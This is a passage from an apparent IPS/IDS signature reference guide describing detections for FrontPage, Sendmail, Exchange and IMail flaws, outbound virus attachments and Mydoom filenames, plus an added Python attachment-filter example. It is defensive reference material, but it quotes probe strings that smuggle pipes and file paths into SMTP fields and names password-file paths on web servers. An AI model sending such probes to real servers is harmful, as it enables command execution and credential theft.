WEB-FRONTPAGE service.cnf access Vulnerability
Threat Level: Warning
Industry ID: CVE-2002-1717 Bugtraq: 4078 Nessus: 10575
Signature Description: Microsoft FrontPage Extensions on IIS or Apache web servers are prone to an information
disclosure vulnerability. The web server may allow remote users to read sensitive information from .cnf files.
Submitting a request for one of the vulnerable files by way of '/_vti_pvt/' will cause the host to reveal sensitive
information.
Signature ID: 1945
WEB-FRONTPAGE service.pwd Vulnerability
Threat Level: Warning
Bugtraq: 1205
Signature Description: Microsoft FrontPage Extensions on IIS or Apache web servers are prone to an information
disclosure vulnerability. The web server may allow remote users to read sensitive information from .pwd files.
Microsoft FrontPage 98 Server Extensions for IIS and Microsoft FrontPage 1.1 are vulnerable.
Signature ID: 1947
WEB-FRONTPAGE services.cnf access Vulnerability
Threat Level: Warning
Industry ID: CVE-2002-1717 Bugtraq: 4078 Nessus: 10575
Signature Description: Microsoft FrontPage Extensions on IIS 5.1 or Apache web servers are prone to an information
disclosure vulnerability. The web server may allow remote users to read sensitive information from .cnf files.
Submitting a request for one of the vulnerable files by way of '/_vti_pvt/' will cause the host to reveal sensitive
information.
Signature ID: 1948
WEB-FRONTPAGE svcacl.cnf access Vulnerability
Threat Level: Warning
Industry ID: CVE-2002-1717 Bugtraq: 4078 Nessus: 10575
Signature Description: Microsoft FrontPage Extensions on IIS 5.1 or Apache web servers are prone to an information
disclosure vulnerability. The web server may allow remote users to read sensitive information from .cnf files.
Submitting a GET request for one of the vulnerable files ('access.cnf', 'botinfs.cnf', 'bots.cnf' or 'linkinfo.cnf') by way of
'/_vti_pvt/' will cause the host to reveal sensitive information.
Signature ID: 1949
WEB-FRONTPAGE users.pwd access Vulnerability
Threat Level: Warning
Signature Description: Microsoft FrontPage Extensions on IIS or Apache web servers are prone to an information
disclosure vulnerability. This signature triggers when an attempt is made to compromise a host running Microsoft
FrontPage Server Extensions by retrieving the file users.pwd. This file contains user password
information. The vulnerable platform is Windows 98 using Microsoft FrontPage Server Extensions. Denial of service is
possible.
Signature ID: 1950
WEB-FRONTPAGE writeto.cnf access Vulnerability
Threat Level: Warning
Industry ID: CVE-2002-1717 Bugtraq: 4078 Nessus: 10575
Signature Description: Microsoft FrontPage Extensions on IIS 5.1 or Apache web servers are prone to an information
disclosure vulnerability. The web server may allow remote users to read sensitive information from .cnf files.
Submitting a GET request for one of the vulnerable files by way of '/_vti_pvt/writeto.cnf' will cause
the host to reveal system path information. The reported problematic files are 'access.cnf', 'botinfs.cnf', 'bots.cnf' and
'linkinfo.cnf'.
Signature ID: 1951
WEB-PHP Marcus Xenakis directory.php arbitrary command attempt Vulnerability
Threat Level: Warning
Industry ID: CVE-2002-0434 Bugtraq: 4278 Nessus: 11017
Signature Description: The Xenakis scripts are vulnerable to shell command execution attacks. The PHP scripts by Marcus S. Xenakis
frequently call shell commands directly. The Xenakis directory.php script provides a web interface for directory
listings, similar to the 'ls' command. An issue exists in this script which could allow a user to execute arbitrary shell
commands. This is achieved by including metacharacters such as ';' or '|' in the script's input. Shell commands will
execute with the permissions of the script process, often the non-privileged user 'nobody'.
Signature ID: 1952
MS Internet Explorer ActiveX bgColor Property Denial of Service Vulnerability
Threat Level: Severe
Industry ID: CVE-2007-0612 Bugtraq: 22288
Signature Description: Microsoft Internet Explorer 5.0 and later on Windows 2000, XP, 2003 and Vista is
vulnerable to denial of service attacks. The issue is due to a vulnerability in multiple ActiveX controls included in
Internet Explorer: the application fails to handle exceptional conditions. Accessing the bgColor, fgColor,
linkColor, alinkColor, vlinkColor or defaultCharset properties of the giffile, htmlfile, jpegfile, mhtmlfile, ODCfile,
pjpegfile, pngfile, xbmfile, xmlfile, xslfile or wdfile objects in mshtml.dll, or of the TriEditDocument.TriEditDocument
or TriEditDocument.TriEditDocument.1 objects in triedit.dll, can cause a NULL pointer dereference. This vulnerability
can be exploited by a malicious web page and results in termination of the Internet Explorer process.
Signature ID: 2002
SMTP VRFY command Vulnerability
Threat Level: Information
Industry ID: CVE-1999-0531 Nessus: 10249
Signature Description: SMTP (Simple Mail Transfer Protocol) is a TCP/IP protocol. It is used to transfer e-mail
messages between computers. Most e-mail systems that send mail over the Internet use SMTP to send messages from
one server to another. The VRFY command requests that the receiving SMTP server verify that a given e-mail user name
is valid. The SMTP server replies with the login name of the user. If the VRFY command is enabled, remote
attackers can enumerate user accounts. Once they have determined a user account they can attempt to determine a password
for that account. Successful exploitation of this issue allows an attacker to gain information or to crash the
system.
Signature ID: 2003
Sendmail mailing to programs attempt
Threat Level: Warning
Industry ID: CVE-1999-0163 CVE-1999-0203 Bugtraq: 2308 Nessus: 10261
Signature Description: Some SMTP servers do not complain when issued the command: MAIL FROM:
root@this_host RCPT TO: |testing. This probably means that it is possible to send mail directly to programs, which is a
serious threat, since it allows anyone to execute arbitrary commands on the host. This finding might be a false
positive, since some MTAs will not complain about this test and will instead just drop the message silently. This rule
triggers when an attempt is made to send a pipe symbol in the SMTP TO header.
Signature ID: 2004
Sendmail mailing to files attempt
Threat Level: Warning
Industry ID: CVE-1999-0096 Nessus: 10259
Signature Description: Some SMTP servers do not complain when issued the command: MAIL FROM:
root@this_host RCPT TO: /tmp/nessus_test. This probably means that it is possible to send mail directly to files, which
is a serious threat, since it allows anyone to overwrite any file on the remote server. This finding might be a
false positive, since some MTAs will not complain about this test and will just drop the message silently. This rule
triggers when an attempt is made to send a '/' symbol in the SMTP TO header.
Signature ID: 2005
Sendmail's from |program attempt
Threat Level: Warning
Industry ID: CVE-1999-0203 CVE-1999-0163 Bugtraq: 2308 Nessus: 10258
Signature Description: Some SMTP servers do not complain when issued the command: MAIL FROM: |testing. This
probably means that it is possible to send mail that will be bounced to a program, which is a serious threat, since it
allows anyone to execute arbitrary commands on the host. This finding might be a false positive, since some
MTAs will not complain about this test but instead just drop the message silently. This rule triggers when an attempt
is made to send a '/' symbol in the SMTP FROM header.
Signature ID: 2006
Sendmail DEBUG attack vulnerability
Threat Level: Warning
Industry ID: CVE-1999-0095 Bugtraq: 1 Nessus: 10247
Signature Description: Sendmail is a Mail Transfer Agent, which is the program that moves mail from one machine to
another. Sendmail implements a general internetwork mail routing facility, featuring aliasing and forwarding, automatic
routing to network gateways, and flexible configuration. Sendmail 5.58 is vulnerable to an access-gaining attack. Successful
exploitation of this attack allows an attacker to gain access to system information. This rule triggers when an
attempt is made to send the debug pattern to the SMTP service. This issue is fixed in Sendmail version 5.59. Administrators are
advised to upgrade to Sendmail version 5.59 or later.
Signature ID: 2007
Spam mail attempt
Threat Level: Warning
Signature Description: This rule triggers when a mail arrives with <> (NULL) in the MAIL FROM command of the mail
header. In most cases this could be spam. But according to RFC 821, NULL is explicitly allowed in the
MAIL FROM command and it helps in preventing loops in error reporting (notification messages) between SMTP
servers. So this rule is a false positive if the mail is a notification message. Administrators are advised to monitor this
log for spam activity.
Signature ID: 2008
EXPN command buffer overflow vulnerability
Threat Level: Warning
Industry ID: CVE-2001-0280 Bugtraq: 2412,223 Nessus: 10620
Signature Description: Simple Mail Transfer Protocol is a TCP/IP protocol used in sending and receiving e-mail. A
remotely exploitable buffer overflow vulnerability affects the SMTP server. The problem lies in the code that handles the
'expn' command. Successful exploitation of this attack allows an attacker to execute arbitrary code on the
vulnerable system. This rule triggers when an attacker sends an overly long argument to the 'expn' command.
Seattle Lab Software SLMail 3.0.2421 is vulnerable to this kind of attack.
Signature ID: 2009
Sendmail 'decode' flaw
Threat Level: Warning
Industry ID: CVE-1999-0096 Nessus: 10248
Signature Description: Some remote SMTP servers pipe mail sent to the 'decode' alias to a program. There have been
a lot of security problems regarding this in the past, as it would allow crackers to overwrite arbitrary files on the remote
server. We suggest you deactivate this alias.
Signature ID: 2010
MS Exchange server SMTP DoS
Threat Level: Information
Industry ID: CVE-2002-0055 Bugtraq: 4204 Nessus: 10885
Signature Description: The Simple Mail Transfer Protocol (SMTP) service in Microsoft Windows and Exchange is
vulnerable to a denial of service attack. If an attacker sends a malformed BDAT data transfer command to an affected server,
the attacker can cause the SMTP service to fail. The SMTP service must be restarted to regain normal functionality.
Signature ID: 2011
MS Exchange Server SMTP DoS with content of b00mAUTH LOGIN
Threat Level: Information
Industry ID: CVE-2002-0055 Bugtraq: 4204 Nessus: 10885
Signature Description: The Simple Mail Transfer Protocol service in Microsoft Exchange Server is vulnerable to DoS
attacks. An attacker sends malformed requests to the SMTP service on MS Exchange servers. The service will restart
automatically, but all the connections established at the time of the attack will be dropped.
Signature ID: 2012
Microsoft SMTP Service Malformed Command Denial of Service Vulnerability
Threat Level: Warning
Industry ID: CVE-2002-0055 Bugtraq: 4204 Nessus: 10885
Signature Description: SMTP (Simple Mail Transfer Protocol) is a TCP/IP protocol. It is used to transfer e-mail
messages between computers. Most e-mail systems that send mail over the Internet use SMTP to send messages
from one server to another. The Simple Mail Transfer Protocol (SMTP) service in Microsoft Windows and Exchange has a
denial of service vulnerability. This rule triggers when a remote attacker sends a malformed "BDAT" data transfer
command to an affected server. Successful exploitation of this issue allows an attacker to cause the SMTP
service to fail. Apply the appropriate patch for this issue, which is available from the vendor's web site.
Signature ID: 2013
Sendmail program piped aliases check
Threat Level: Information
Industry ID: CVE-1999-0531 Nessus: 10249
Signature Description: An attacker can collect information about sendmail aliases that are piped to programs. It is
common to define aliases that pipe received mail to a program for processing. This signature generates an event when
an attacker sends an expn command with the argument root to the Sendmail program.
Signature ID: 2014
Sendmail program piped aliases check with expn and "majordomo"
Threat Level: Information
Industry ID: CVE-1999-0565
Signature Description: An attacker can collect information about sendmail aliases that are piped to programs. It is
common to define aliases that pipe received mail to a program for processing. This signature detects attacks in which
an expn command with the argument majordomo is sent to the Sendmail program.
Signature ID: 2015
Sendmail program piped aliases check with expn and "postmaster"
Threat Level: Information
Signature Description: An attacker can collect information about sendmail aliases that are piped to programs. It is
common to define aliases that pipe received mail to a program for processing. This signature detects attacks in which
an expn command with the argument POSTMASTER is sent to the Sendmail program.
Signature ID: 2016
Sendmail program piped aliases check with expn and "news"
Threat Level: Information
Signature Description: An attacker can collect information about sendmail aliases that are piped to programs. It is
common to define aliases that pipe received mail to a program for processing. This signature detects attacks in which
an expn command with the argument NEWS is sent to the Sendmail program.
Signature ID: 2018
Sendmail program piped aliases check with expn and "admin"
Threat Level: Information
Signature Description: An attacker can collect information about sendmail aliases that are piped to programs. It is
common to define aliases that pipe received mail to a program for processing. This signature detects attacks in which
an expn command with the argument ADMIN is sent to the Sendmail program.
Signature ID: 2019
Sendmail program piped aliases check with expn and "webmaster"
Threat Level: Information
Signature Description: An attacker can collect information about sendmail aliases that are piped to programs. It is
common to define aliases that pipe received mail to a program for processing. This signature detects attacks in which
an expn command with the argument WEBMASTER is sent to the Sendmail program.
Signature ID: 2020
Sendmail program piped aliases check with expn and "uucp"
Threat Level: Information
Signature Description: An attacker can collect information about sendmail aliases that are piped to programs. It is
common to define aliases that pipe received mail to a program for processing. This signature detects attacks in which
an expn command with the argument UUCP is sent to the Sendmail program.
Signature ID: 2021
Sendmail (8.6.9) identd check
Threat Level: Information
Industry ID: CVE-1999-0204
Signature Description: A vulnerability in version 8.6.9 of Berkeley Sendmail allows remote users to execute arbitrary
commands on vulnerable systems. This module must be run as 'root', with the system's identd daemon disabled. If the
remote mailer does not support the ident protocol, the module will wait for an ident connection for several seconds
before reporting the site as not vulnerable.
Signature ID: 2022
Sendmail 8.6.11 Denial of Service Vulnerability
Threat Level: Information
Signature Description: SMTP (Simple Mail Transfer Protocol) is a TCP/IP protocol. It is used to transfer e-mail
messages between computers. Most e-mail systems that send mail over the Internet use SMTP to send messages
from one server to another. This signature detects the content '8.6.11'. This 8.6.11 version check module examines
available sendmail banners to determine the presence of Berkeley sendmail 8.6.11. If this version is detected, it is
possible that the host is vulnerable to a denial of service.
Signature ID: 2023
Sendmail 8.6.12 Denial of Service Vulnerability
Threat Level: Information
Signature Description: SMTP (Simple Mail Transfer Protocol) is a TCP/IP protocol. It is used to transfer e-mail
messages between computers. Most e-mail systems that send mail over the Internet use SMTP to send messages
from one server to another. This signature detects the content '8.6.12'. This 8.6.12 version check module examines
available sendmail banners to determine the presence of Berkeley sendmail 8.6.12. If this version is detected, it is
possible that the host is vulnerable to a denial of service.
Signature ID: 2024
Sendmail (8.7.5) GECOS field buffer overflow check
Threat Level: Information
Industry ID: CVE-1999-0131
Signature Description: An attacker can check to see if the host is running sendmail 8.7.5. Berkeley sendmail 8.7.5 has
two bugs which allow for local users to gain either default user (most often daemon) or root privileges.
Signature ID: 2025
Sendmail (8.8.0/8.8.1) MIME buffer overflow check with version 8.8.0
Threat Level: Information
Industry ID: CVE-1999-0206
Signature Description: An attacker can check if you are running sendmail version 8.8.0 or 8.8.1. Both these versions of
sendmail have a vulnerability which could allow intruders to access the vulnerable system as root.
Signature ID: 2026
Sendmail (8.8.0/8.8.1) MIME buffer overflow check with version of 8.8.1
Threat Level: Information
Industry ID: CVE-1999-0206
Signature Description: An attacker can discern if you are running sendmail version 8.8.0 or 8.8.1. Both of these
versions of sendmail have a weakness which could allow intruders to access the vulnerable system as root.
Signature ID: 2027
Mail forgery check using Cybercop
Threat Level: Information
Signature Description: Cybercop is software used to find vulnerabilities on a target system. Using this
software, an attacker can learn the vulnerabilities of the target system, and it may be possible to forge mail on the target mail
server.
Signature ID: 2028
Sendmail (8.8.3/8.8.4) Version check for MIME Buffer Overflow
Threat Level: Information
Industry ID: CVE-1999-0047 Bugtraq: 685
Signature Description: An attacker can attempt to discern if you are running sendmail version 8.8.4 or 8.8.3. Both of
these versions of sendmail have a weakness which can allow intruders to access the vulnerable system as root.
Signature ID: 2029
Sendmail (8.8.3/8.8.4) MIME buffer overflow check with version of 8.8.4
Threat Level: Information
Industry ID: CVE-1999-0047 Bugtraq: 685
Signature Description: An attacker can attempt to check if you are running sendmail version 8.8.4 or 8.8.3. Both of
these versions of sendmail have a vulnerability which may allow intruders to access the vulnerable system as root.
Signature ID: 2030
Sendmail.cf Relaying vulnerability
Threat Level: Information
Industry ID: CVE-2002-1278 Bugtraq: 6118
Signature Description: There is a vulnerability in sendmail.cf. Using this vulnerability, an attacker can determine whether your
mail server can be used as a mail gateway or relay. When used as a mail relay, your host may be prone to "spammers"
relaying mail through your host to reach their intended audience. If a remote attacker sends an e-mail message using
"user%domain@" as the format for the recipient address, the attacker could then use the sendmail server as an open
mail relay. For example, if an outside user were to send mail formatted as being to
"target%[email protected]", that message could be re-transmitted to the target recipient,
apparently originating from your mail server.
Signature ID: 2032
SmartMax Mail-Max Remote Buffer Overflow Vulnerability
Threat Level: Warning
Industry ID: CVE-1999-0404 Bugtraq: 2312
Signature Description: Smartmax MailMax is an e-mail server for Windows 95/98/NT. Smartmax MailMax 1.0.0 is
vulnerable to a buffer overflow. The attack targets the SMTP command processing function of the SMTP server. A
successful exploitation of this attack allows an attacker to execute arbitrary commands with the privileges of the user
running MailMax. This rule triggers when an attempt is made to exploit this vulnerability.
Signature ID: 2033
Cmail User Leak vulnerability
Threat Level: Information
Signature Description: CMailServer is e-mail server software for Windows which provides web-based e-mail
service. CMailServer is also an anti-virus and anti-spam mail server. It makes it easy to control POP3/SMTP mail
connections. This web mail server provides an open development interface for web developers who want to customize
the web mail pages. CMailServer has a vulnerability that allows system user names to be verified. This rule generates an event
when an attacker accesses user names.
Signature ID: 2036
IMail's whois32 service can be remotely crashed.
Threat Level: Warning
Signature Description: IMail is a popular multi-protocol mail server for Windows NT environments. The Whois32
service is included in the IMail package, and it is vulnerable to a buffer overflow. A successful
exploitation of this vulnerability allows an attacker to execute arbitrary commands on the vulnerable system.
Signature ID: 2038
Windows NT - SLmail v3.1 Denial of Service Vulnerability
Threat Level: Warning
Signature Description: SLMail is described by the vendor as a "security conscious Windows NT/2000 email server".
This rule triggers when a packet contains the pattern 'SLmail v3.1'. This attack raises the CPU usage of the
slsmtp.exe process to almost 100%.
Signature ID: 2039
Microsoft Exchange Server Invalid MIME Header charset = "" DoS Vulnerability
Threat Level: Warning
Industry ID: CVE-2000-1006 Bugtraq: 1869 Nessus: 10558
Signature Description: Microsoft Exchange Server is a messaging and collaboration software product developed by
Microsoft. Microsoft Exchange Server version 5.5 has a denial of service vulnerability. This rule triggers when an
attacker sends an e-mail with malformed MIME headers containing an empty value for charset. Successful exploitation of
this issue allows an attacker to cause the Information Store service to fail and crash the Exchange server.
Signature ID: 2040
W32/Frethem Malicious Code
Threat Level: Information
Signature Description: W32/Frethem is a malicious Windows program with an internal SMTP mail delivery agent.
W32/Frethem arrives as an e-mail message containing three MIME parts (multipart/alternative,
boundary=L1db82sd319dm2ns0f4383dhG) with the subject "Re: Your password!" The body of the message is
contained in the first MIME part and includes a specially crafted IFRAME tag that will cause the malicious attachment
to be executed when this part is rendered in a vulnerable mail user agent.
Signature ID: 2041
IMC SMTP EHLO Buffer Overrun vulnerability
Threat Level: Information
Industry ID: CVE-2002-0698 Bugtraq: 5306 Nessus: 11053
Signature Description: The Internet Mail Connector (IMC) provides SMTP functionality for the Microsoft Exchange
Server. The Internet Mail Connector in Exchange Server 5.5 is vulnerable to a buffer overflow in the code that handles
Extended Hello (EHLO) commands, which are used to query other servers to obtain a list of supported SMTP
operations. Successful exploitation of this attack allows an attacker to execute arbitrary code with system
privileges. This rule triggers when an attempt is made to exploit this vulnerability. Patches are
available from the vendor's web site.
Signature ID: 2050
SMTP From comment overflow
Threat Level: Information
Signature Description: A vulnerability exists in the Sendmail MTA daemon that could allow an attacker the
opportunity to gain root access. A programming error exists such that a buffer overflow can be caused using the header
fields in an SMTP session. Using the '<' and '>' characters in the 'from' field, an attacker can increment a counter to the
extent that the buffer exceeds its limit.
Signature ID: 2051
VIRUS OUTBOUND .hsq file attachment
Threat Level: Information
Signature Description: A virus is a computer program that can copy itself and infect a computer without the permission or
knowledge of the user. The term 'virus' is also commonly used to refer to many different types of malware and adware
programs. This rule triggers when a '.hsq' file is attached and then blocks the attachment. When a prohibited attachment has
been blocked, the attachment is not delivered to the recipient but the message is still delivered. The sender will
not receive any notification that the attachment has been removed.
Signature ID: 2052
VIRUS OUTBOUND .com file attachment
Threat Level: Information
Signature Description: This event indicates that an outgoing e-mail message possibly containing a virus has been
detected. This rule generates an event when a filename extension commonly used by viruses is detected. A virus is a
computer program that can copy itself and infect a computer without the permission or knowledge of the user. The term
'virus' is also commonly used to refer to many different types of malware and adware programs. This rule triggers
when a '.com' file is attached and then blocks the attachment. When a prohibited attachment has been blocked, the attachment
is not delivered to the recipient but the message is still delivered. The sender will not receive any notification that
the attachment has been removed.
Signature ID: 2053
VIRUS OUTBOUND .sys file attachment
Threat Level: Information
Signature Description: A virus is a computer program that can copy itself and infect a computer without the permission or
knowledge of the user. The term 'virus' is also commonly used to refer to many different types of malware and adware
programs. This rule triggers when a '.sys' file is attached and then blocks the attachment. When a prohibited attachment has
been blocked, the attachment is not delivered to the recipient but the message is still delivered. The sender will
not receive any notification that the attachment has been removed.
Signature ID: 2054
VIRUS OUTBOUND .vxd file attachment
Threat Level: Information
Signature Description: A virus is a computer program that can copy itself and infect a computer without the permission or
knowledge of the user. The term 'virus' is also commonly used to refer to many different types of malware and adware
programs. This rule triggers when a '.vxd' file is attached and then blocks the attachment. When a prohibited attachment has
been blocked, the attachment is not delivered to the recipient but the message is still delivered. The sender will
not receive any notification that the attachment has been removed.
Signature ID: 2055
VIRUS OUTBOUND .dll file attachment
Threat Level: Information
Signature Description: A virus is a computer program that can copy itself and infect a computer without the permission or
knowledge of the user. The term 'virus' is also commonly used to refer to many different types of malware and adware
programs. This rule triggers when a '.dll' file is attached and then blocks the attachment. When a prohibited attachment has
been blocked, the attachment is not delivered to the recipient but the message is still delivered. The sender will
not receive any notification that the attachment has been removed.
Signature ID: 2056
VIRUS OUTBOUND .cpp file attachment
Threat Level: Information
Signature Description: A virus is a computer program that can copy itself and infect a computer without the permission or
knowledge of the user. The term 'virus' is also commonly used to refer to many different types of malware and adware
programs. This rule triggers when a '.cpp' file is attached, and blocks the attachment. When a prohibited attachment has
been blocked, the attachment is not delivered to the recipient, but the message itself is still delivered. The sender does
not receive any notification that the attachment has been removed.
279
ProCurve TMS zl Module IPS/IDS Signature
Reference Guide Version RLX.10.2.2.94
Signature ID: 2057
VIRUS OUTBOUND .diz file attachment
Threat Level: Information
Signature Description: This event indicates that an outgoing email message possibly containing a virus has been
detected. This rule generates an event when a filename extension commonly used by viruses is detected. This signature
generates a log entry for a .diz file attachment.
Signature ID: 2058
VIRUS OUTBOUND .bat file attachment
Threat Level: Information
Signature Description: This event indicates that an outgoing email message possibly containing a virus has been
detected. This rule generates an event when a filename extension commonly used by viruses is detected. This signature
generates a log entry for a .bat file attachment.
Signature ID: 2059
VIRUS OUTBOUND .ini file attachment
Threat Level: Information
Signature Description: A virus is a computer program that can copy itself and infect a computer without the permission or
knowledge of the user. The term 'virus' is also commonly used to refer to many different types of malware and adware
programs. This rule triggers when a '.ini' file is attached, and blocks the attachment. When a prohibited attachment has
been blocked, the attachment is not delivered to the recipient, but the message itself is still delivered. The sender does
not receive any notification that the attachment has been removed.
Signature ID: 2060
VIRUS OUTBOUND .reg file attachment
Threat Level: Information
Signature Description: A virus is a computer program that can copy itself and infect a computer without the permission or
knowledge of the user. The term 'virus' is also commonly used to refer to many different types of malware and adware
programs. This rule triggers when a '.reg' file is attached, and blocks the attachment. When a prohibited attachment has
been blocked, the attachment is not delivered to the recipient, but the message itself is still delivered. The sender does
not receive any notification that the attachment has been removed.
Signature ID: 2061
VIRUS OUTBOUND .chm file attachment
Threat Level: Information
Signature Description: This event indicates that an outgoing email message possibly containing a virus has been
detected. This rule generates an event when a filename extension commonly used by viruses is detected.
Signature ID: 2062
VIRUS OUTBOUND .hta file attachment
Threat Level: Information
Signature Description: A virus is a computer program that can copy itself and infect a computer without the permission or
knowledge of the user. The term 'virus' is also commonly used to refer to many different types of malware and adware
programs. This rule triggers when a '.hta' file is attached, and blocks the attachment. When a prohibited attachment has
been blocked, the attachment is not delivered to the recipient, but the message itself is still delivered. The sender does
not receive any notification that the attachment has been removed.
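The VIRUS OUTBOUND signatures above all describe the same gateway behaviour: match an attachment by its filename extension, drop that part, deliver the rest of the message, and tell the sender nothing. The following is an added example of that filter written with Python's standard `email` package; it is not the TMS zl Module's implementation or code from the guide. The block list is constructed from the extensions named in the signatures above, and the message it processes is constructed sample data.

```python
"""Added example (not part of the signature guide or the TMS zl Module): an
outbound attachment filter with the behaviour the VIRUS OUTBOUND signatures
describe. The block list is constructed from the extensions named above;
message contents are constructed sample data."""
from email import policy
from email.message import EmailMessage
from email.parser import BytesParser

# Extensions named by the VIRUS OUTBOUND signatures on this page (lower-case).
PROHIBITED_EXTENSIONS = {
    ".com", ".sys", ".vxd", ".dll", ".cpp", ".diz", ".bat", ".ini", ".reg",
    ".chm", ".hta",
}


def is_prohibited(filename):
    """True when the attachment's final extension is on the block list.
    Only the last suffix counts, so 'notes.txt.com' is judged by '.com'."""
    if not filename:
        return False
    name = filename.strip().lower()
    dot = name.rfind(".")
    return dot != -1 and name[dot:] in PROHIBITED_EXTENSIONS


def strip_prohibited_attachments(raw):
    """Parse a raw RFC 5322 message and drop prohibited attachments.

    Returns (cleaned_message, removed_filenames). As in the signature
    descriptions, the message itself is still delivered and no notice is
    added for the sender; only the attachment is removed.
    """
    msg = BytesParser(policy=policy.default).parsebytes(raw)
    removed = []
    if not msg.is_multipart():
        return msg, removed          # nothing attached, nothing to strip
    kept = []
    for part in msg.iter_parts():
        fname = part.get_filename()  # None for the plain text body
        if is_prohibited(fname):
            removed.append(fname)
        else:
            kept.append(part)
    msg.set_payload(kept)            # rebuild the multipart body without the blocked parts
    return msg, removed


def build_sample():
    """Constructed outbound message: a text body, a '.com' attachment and a
    harmless '.txt' attachment (sample data, not captured traffic)."""
    msg = EmailMessage()
    msg["From"] = "alice@example.test"
    msg["To"] = "bob@example.test"
    msg["Subject"] = "quarterly report"
    msg.set_content("Report attached.")
    msg.add_attachment(b"MZ\x90\x00", maintype="application",
                       subtype="octet-stream", filename="setup.com")
    msg.add_attachment("meeting notes", subtype="plain", filename="notes.txt")
    return msg.as_bytes()


if __name__ == "__main__":
    cleaned, removed = strip_prohibited_attachments(build_sample())
    print("removed:", removed)
    print(cleaned.as_bytes().decode())
```

Running the block prints `removed: ['setup.com']` followed by the message with only the text body and `notes.txt` left in it. Note that the check looks only at the last suffix of the declared filename, exactly as the signatures do; a gateway that also wants to catch renamed executables would need to inspect content, which these signatures do not claim to do.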
Signature ID: 2066
SMTP Client [Novarg Worm]
Threat Level: Information
Signature Description: The Novarg worm (also known as Mydoom) infects systems through email attachments and p2p
file sharing. It targets all Win32 computers. Once infected, the worm installs a backdoor, allowing an attacker
remote access to the system. It also uses its own SMTP engine to send out email messages. This rule triggers when
the packet contains the pattern 'message.zip'.
Signature ID: 2067
SMTP Client [Novarg Worm]
Threat Level: Information
Signature Description: This rule triggers when the packet contains the pattern 'document.zip'. The Novarg worm (also
known as Mydoom) infects systems through email attachments and p2p file sharing. It targets all Win32
computers. Once infected, the worm installs a backdoor, allowing an attacker remote access to the system. It also uses
its own SMTP engine to send out email messages.
Signature ID: 2068
SMTP Client [Novarg Worm]
Threat Level: Information
Signature Description: The Novarg worm (also known as Mydoom) infects systems through email attachments and p2p
file sharing. It targets all Win32 computers. Once infected, the worm installs a backdoor, allowing an attacker
remote access to the system. It also uses its own SMTP engine to send out email messages. This rule triggers when
the packet contains the pattern 'readme.zip'.
Signature ID: 2069
SMTP Client [Novarg Worm]
Threat Level: Information
Signature Description: This signature triggers when the packet contains the pattern 'doc.bat'. The Novarg worm (also known as
Mydoom) infects systems through email attachments and p2p file sharing. It targets all Win32 computers. Once
infected, the worm installs a backdoor, allowing an attacker remote access to the system. It also uses its own SMTP
engine to send out email messages.
Signature ID: 2070
SMTP Client [Novarg Worm]
Threat Level: Information
Signature Description: The Novarg worm (also known as Mydoom) infects systems through email attachments and p2p
file sharing. It targets all Win32 computers. Once infected, the worm installs a backdoor, allowing an attacker
remote access to the system. It also uses its own SMTP engine to send out email messages. This event triggers when
the packet contains the pattern 'hello.cmd'.
Signature ID: 2071
SMTP Client [Novarg Worm]
Threat Level: Information
Signature Description: This rule triggers when the packet contains the pattern 'data.txt.exe'. The Novarg worm (also known as
Mydoom) infects systems through email attachments and p2p file sharing. It targets all Win32 computers. Once
infected, the worm installs a backdoor, allowing an attacker remote access to the system. It also uses its own SMTP
engine to send out email messages.
Signature ID: 2072
SMTP Client [Novarg Worm]
Threat Level: Information
Signature Description: This signature triggers when the packet contains the pattern 'file.scr'. The Novarg worm (also known
as Mydoom) infects systems through email attachments and p2p file sharing. It targets all Win32 computers. Once
infected, the worm installs a backdoor, allowing an attacker remote access to the system. It also uses its own SMTP
engine to send out email messages.
Signature ID: 2073
SMTP Client [Novarg Worm]
Threat Level: Information
Signature Description: The Novarg worm (also known as Mydoom) infects systems through email attachments and p2p
file sharing. It targets all Win32 computers. Once infected, the worm installs a backdoor, allowing an attacker
remote access to the system. It also uses its own SMTP engine to send out email messages. This signature triggers
when the packet contains the pattern 'body.scr'.
Signature ID: 2074
SMTP Client [Novarg Worm]
Threat Level: Information
Signature Description: This signature triggers when the packet contains the pattern 'text.pif'. The Novarg worm (also known
as Mydoom) infects systems through email attachments and p2p file sharing. It targets all Win32 computers. Once
infected, the worm installs a backdoor, allowing an attacker remote access to the system. It also uses its own SMTP
engine to send out email messages.
Signature ID: 2075
SMTP Client [Novarg Worm]
Threat Level: Information
Signature Description: The Novarg worm (also known as Mydoom) infects systems through email attachments and p2p
file sharing. It targets all Win32 computers. Once infected, the worm installs a backdoor, allowing an attacker
remote access to the system. It also uses its own SMTP engine to send out email messages. This rule triggers when
the packet contains the pattern 'text.htm.pif'.
Signature ID: 2076
Microsoft Exchange Server Extended Verb XEXCH50 Request Buffer Overflow Vulnerability
Threat Level: Severe
Industry ID: CVE-2003-0714 Bugtraq: 8838 Nessus: 11889
Signature Description: Microsoft Exchange Server is a messaging and collaborative software product developed by
Microsoft. Microsoft Exchange 5.5 and Microsoft Exchange 2000 are vulnerable to a buffer overflow caused by
improper bounds checking. XEXCH50 is an Exchange SMTP extension verb that is used to relay certain message
properties, such as envelope message and recipient properties. The Exchange Server accepts the command verb
XEXCH50 before NTLM authentication. A malicious attacker could craft an SMTP extended verb request using a
negative number or a very large positive number. By connecting to an SMTP port on the vulnerable Exchange server, a
remote attacker could send a specially crafted XEXCH50 request to overflow a buffer and cause the SMTP service to
fail and execute arbitrary code on the system with Local System privileges. Apply the appropriate patch for your
system, as listed in Microsoft Security Bulletin MS03-046.
Signature ID: 2098
VIRUS OUTBOUND bad file attachment
Threat Level: Information
Signature Description: This event may indicate a possible virus infection of a host on the protected network. Viruses
may propagate in many different ways. Many arrive in the form of email attachments that an unsuspecting user may
trigger by opening the attachment. Once infected, many viruses have the ability to use the infected host as a means of
spreading copies of themselves to other machines on the protected and external networks.
Signature ID: 2200
CSM Mailserver HELO Buffer Overflow Vulnerability
Threat Level: Information
Industry ID: CVE-2000-0042 Bugtraq: 895
Signature Description: CSM Mailserver has an unchecked buffer in the code that handles the HELO command, which
makes it subject to a buffer overflow vulnerability. This rule triggers when an attacker sends a long HELO command
(above 120000 bytes). Successful exploitation of this issue allows an attacker to crash the system, execute
arbitrary code, or cause a denial of service. No remedy was available as of October 2008.
Signature ID: 2201
VIRUS Klez Incoming
Threat Level: Warning
Signature Description: This W32/Klez variant has the ability to spoof the email 'From:' field. The sender's address
used by the virus may be one that was found on the infected user's system. It may appear that you have received this
virus from one person when it was actually sent from a different user's system. Viewing the entire email header will
display the actual sender's address. This worm makes use of the "Incorrect MIME Header Can Cause IE to Execute E-mail
Attachment" vulnerability in Microsoft Internet Explorer. This worm arrives in an email message with a subject and
